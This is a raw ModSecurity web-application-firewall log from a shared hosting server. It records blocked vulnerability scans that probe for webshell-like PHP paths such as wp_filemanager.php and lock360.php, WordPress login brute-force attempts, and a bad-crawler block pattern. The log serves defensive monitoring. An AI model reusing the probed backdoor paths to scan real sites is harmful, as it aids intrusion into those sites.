[Tue May 26 19:15:27.852225 2026] [security2:error] [pid 26857:tid 27041] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj99foqtHEG_e9i6Gt8wAAALs"]
[Tue May 26 19:15:29.522495 2026] [security2:error] [pid 26857:tid 26989] [client 113.173.39.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj-dfoqtHEG_e9i6GuUQAAAIc"]
[Tue May 26 19:15:29.898272 2026] [security2:error] [pid 26857:tid 27090] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj-dfoqtHEG_e9i6GuZgAAAOw"]
[Tue May 26 19:15:32.077806 2026] [security2:error] [pid 26857:tid 27076] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj-9foqtHEG_e9i6Gu8gAAAN4"]
[Tue May 26 19:15:32.192093 2026] [security2:error] [pid 26857:tid 26996] [client 4.204.219.172:28848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvBgAAAI4"]
[Tue May 26 19:15:32.192220 2026] [security2:error] [pid 26857:tid 26996] [client 4.204.219.172:28848] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvBgAAAI4"]
[Tue May 26 19:15:32.343678 2026] [security2:error] [pid 26857:tid 27051] [client 4.204.219.172:29720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/wp-conflg.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvGQAAAMU"]
[Tue May 26 19:15:32.343787 2026] [security2:error] [pid 26857:tid 27051] [client 4.204.219.172:29720] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/wp-conflg.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvGQAAAMU"]
[Tue May 26 19:15:32.494064 2026] [security2:error] [pid 26857:tid 27020] [client 4.204.219.172:35668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvIAAAAKY"]
[Tue May 26 19:15:32.494187 2026] [security2:error] [pid 26857:tid 27020] [client 4.204.219.172:35668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvIAAAAKY"]
[Tue May 26 19:15:32.639956 2026] [security2:error] [pid 26857:tid 26989] [client 4.204.219.172:28842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/ma.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvJwAAAIc"]
[Tue May 26 19:15:32.640038 2026] [security2:error] [pid 26857:tid 26989] [client 4.204.219.172:28842] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/ma.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvJwAAAIc"]
[Tue May 26 19:15:32.791974 2026] [security2:error] [pid 26857:tid 27026] [client 4.204.219.172:35671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/gm.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvMAAAAKw"]
[Tue May 26 19:15:32.792068 2026] [security2:error] [pid 26857:tid 27026] [client 4.204.219.172:35671] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/gm.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvMAAAAKw"]
[Tue May 26 19:15:32.936353 2026] [security2:error] [pid 26857:tid 27090] [client 4.204.219.172:35684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvOAAAAOw"]
[Tue May 26 19:15:32.936451 2026] [security2:error] [pid 26857:tid 27090] [client 4.204.219.172:35684] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvOAAAAOw"]
[Tue May 26 19:15:33.080208 2026] [security2:error] [pid 26857:tid 27104] [client 4.204.219.172:35630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/ppx.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvQgAAAPo"]
[Tue May 26 19:15:33.080312 2026] [security2:error] [pid 26857:tid 27104] [client 4.204.219.172:35630] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/ppx.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvQgAAAPo"]
[Tue May 26 19:15:33.224108 2026] [security2:error] [pid 26857:tid 27109] [client 4.204.219.172:29725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvTwAAAP8"]
[Tue May 26 19:15:33.224187 2026] [security2:error] [pid 26857:tid 27109] [client 4.204.219.172:29725] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvTwAAAP8"]
[Tue May 26 19:15:33.360818 2026] [security2:error] [pid 26857:tid 26995] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj_NfoqtHEG_e9i6GvNwAAAI0"]
[Tue May 26 19:15:33.372414 2026] [security2:error] [pid 26857:tid 27005] [client 4.204.219.172:35597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/filexp.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvVQAAAJc"]
[Tue May 26 19:15:33.372504 2026] [security2:error] [pid 26857:tid 27005] [client 4.204.219.172:35597] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/filexp.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvVQAAAJc"]
[Tue May 26 19:15:33.520573 2026] [security2:error] [pid 26857:tid 27103] [client 4.204.219.172:29503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/m7rpo0.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvXgAAAPk"]
[Tue May 26 19:15:33.520689 2026] [security2:error] [pid 26857:tid 27103] [client 4.204.219.172:29503] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/m7rpo0.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvXgAAAPk"]
[Tue May 26 19:15:33.672858 2026] [security2:error] [pid 26857:tid 27111] [client 4.204.219.172:35664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvaAAAAQE"]
[Tue May 26 19:15:33.673229 2026] [security2:error] [pid 26857:tid 27111] [client 4.204.219.172:35664] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvaAAAAQE"]
[Tue May 26 19:15:33.823003 2026] [security2:error] [pid 26857:tid 27108] [client 4.204.219.172:28828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvcgAAAP4"]
[Tue May 26 19:15:33.823107 2026] [security2:error] [pid 26857:tid 27108] [client 4.204.219.172:28828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvcgAAAP4"]
[Tue May 26 19:15:33.970904 2026] [security2:error] [pid 26857:tid 26998] [client 4.204.219.172:29501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/7gt.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvegAAAJA"]
[Tue May 26 19:15:33.971005 2026] [security2:error] [pid 26857:tid 26998] [client 4.204.219.172:29501] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/7gt.php"] [unique_id "ahWj_dfoqtHEG_e9i6GvegAAAJA"]
[Tue May 26 19:15:34.113914 2026] [security2:error] [pid 26857:tid 27075] [client 4.204.219.172:35599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/2468.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvgQAAAN0"]
[Tue May 26 19:15:34.113999 2026] [security2:error] [pid 26857:tid 27075] [client 4.204.219.172:35599] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/2468.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvgQAAAN0"]
[Tue May 26 19:15:34.257568 2026] [security2:error] [pid 26857:tid 27022] [client 4.204.219.172:28803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/s2.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvigAAAKg"]
[Tue May 26 19:15:34.257674 2026] [security2:error] [pid 26857:tid 27022] [client 4.204.219.172:28803] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/s2.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvigAAAKg"]
[Tue May 26 19:15:34.401393 2026] [security2:error] [pid 26857:tid 27065] [client 4.204.219.172:29699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/tiny2.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvmAAAANM"]
[Tue May 26 19:15:34.401489 2026] [security2:error] [pid 26857:tid 27065] [client 4.204.219.172:29699] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/tiny2.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvmAAAANM"]
[Tue May 26 19:15:34.561074 2026] [security2:error] [pid 26857:tid 27031] [client 4.204.219.172:35709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.219.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvnAAAALE"]
[Tue May 26 19:15:34.561234 2026] [security2:error] [pid 26857:tid 27031] [client 4.204.219.172:35709] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wimbiscakes.in.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahWj_tfoqtHEG_e9i6GvnAAAALE"]
[Tue May 26 19:15:34.823797 2026] [security2:error] [pid 26857:tid 27020] [client 85.208.96.209:63772] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahWj_tfoqtHEG_e9i6GvqQAAAKY"]
[Tue May 26 19:15:34.823963 2026] [security2:error] [pid 26857:tid 27020] [client 85.208.96.209:63772] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahWj_tfoqtHEG_e9i6GvqQAAAKY"]
[Tue May 26 19:15:35.170594 2026] [security2:error] [pid 26857:tid 26992] [client 195.2.78.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWj_9foqtHEG_e9i6GvuAAAAIo"], referer: http://anujtradingco.com/features/header-slider-revolution/
[Tue May 26 19:15:36.029720 2026] [security2:error] [pid 26857:tid 27002] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj_9foqtHEG_e9i6Gv0gAAAJQ"]
[Tue May 26 19:15:37.353948 2026] [security2:error] [pid 26857:tid 26898] [remote 95.217.78.234:53606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkAdfoqtHEG_e9i6GwLAAA6Sg"]
[Tue May 26 19:15:37.527302 2026] [security2:error] [pid 26857:tid 27046] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkAdfoqtHEG_e9i6GwJQAAAMA"]
[Tue May 26 19:15:37.677485 2026] [security2:error] [pid 26857:tid 26908] [remote 95.217.78.234:53606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkAdfoqtHEG_e9i6GwRAAAtjI"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:15:39.122855 2026] [security2:error] [pid 26857:tid 27082] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWkAtfoqtHEG_e9i6GwjgAAAOQ"]
[Tue May 26 19:15:39.128069 2026] [security2:error] [pid 26857:tid 27090] [client 45.148.10.159:59018] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.theafterglow-centre.com"] [uri "/"] [unique_id "ahWkAtfoqtHEG_e9i6GwjAAAAOw"]
[Tue May 26 19:15:40.111526 2026] [security2:error] [pid 26857:tid 27080] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkA9foqtHEG_e9i6GwvgAAAOI"]
[Tue May 26 19:15:41.800265 2026] [security2:error] [pid 26857:tid 26989] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.theafterglow-centre.com"] [uri "/"] [unique_id "ahWkBdfoqtHEG_e9i6GxLAAAAIc"]
[Tue May 26 19:15:41.800647 2026] [security2:error] [pid 26857:tid 27073] [client 45.148.10.159:49906] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.theafterglow-centre.com"] [uri "/"] [unique_id "ahWkBdfoqtHEG_e9i6GxKgAAANs"]
[Tue May 26 19:15:42.139479 2026] [security2:error] [pid 26857:tid 27060] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkBdfoqtHEG_e9i6GxJAAAAM4"]
[Tue May 26 19:15:44.020480 2026] [security2:error] [pid 26857:tid 27093] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkB9foqtHEG_e9i6GxjQAAAO8"]
[Tue May 26 19:15:44.646214 2026] [security2:error] [pid 26857:tid 26867] [remote 31.24.44.107:48502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkCNfoqtHEG_e9i6GxvgAAuQk"]
[Tue May 26 19:15:44.842636 2026] [security2:error] [pid 26857:tid 27074] [client 45.92.1.242:51674] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/wp-includes/wlwmanifest.xml"] [unique_id "ahWkCNfoqtHEG_e9i6Gx2gAAANw"]
[Tue May 26 19:15:44.947607 2026] [security2:error] [pid 26857:tid 26972] [remote 31.24.44.107:48502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkCNfoqtHEG_e9i6Gx2wAAhnI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:15:45.282156 2026] [security2:error] [pid 26857:tid 27079] [client 45.92.1.242:55954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.1.92.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/xmlrpc.php"] [unique_id "ahWkCdfoqtHEG_e9i6Gx5wAAAOE"]
[Tue May 26 19:15:45.746870 2026] [security2:error] [pid 26857:tid 27049] [client 45.92.1.242:58410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWkCdfoqtHEG_e9i6GyEwAAAMM"]
[Tue May 26 19:15:45.923026 2026] [security2:error] [pid 26857:tid 27034] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkCdfoqtHEG_e9i6Gx_wAAALQ"]
[Tue May 26 19:15:46.055890 2026] [security2:error] [pid 26857:tid 27048] [client 45.92.1.242:51474] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWkCtfoqtHEG_e9i6GyHQAAAMI"]
[Tue May 26 19:15:46.341905 2026] [security2:error] [pid 26857:tid 27006] [client 45.92.1.242:52877] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWkCtfoqtHEG_e9i6GyKwAAAJg"]
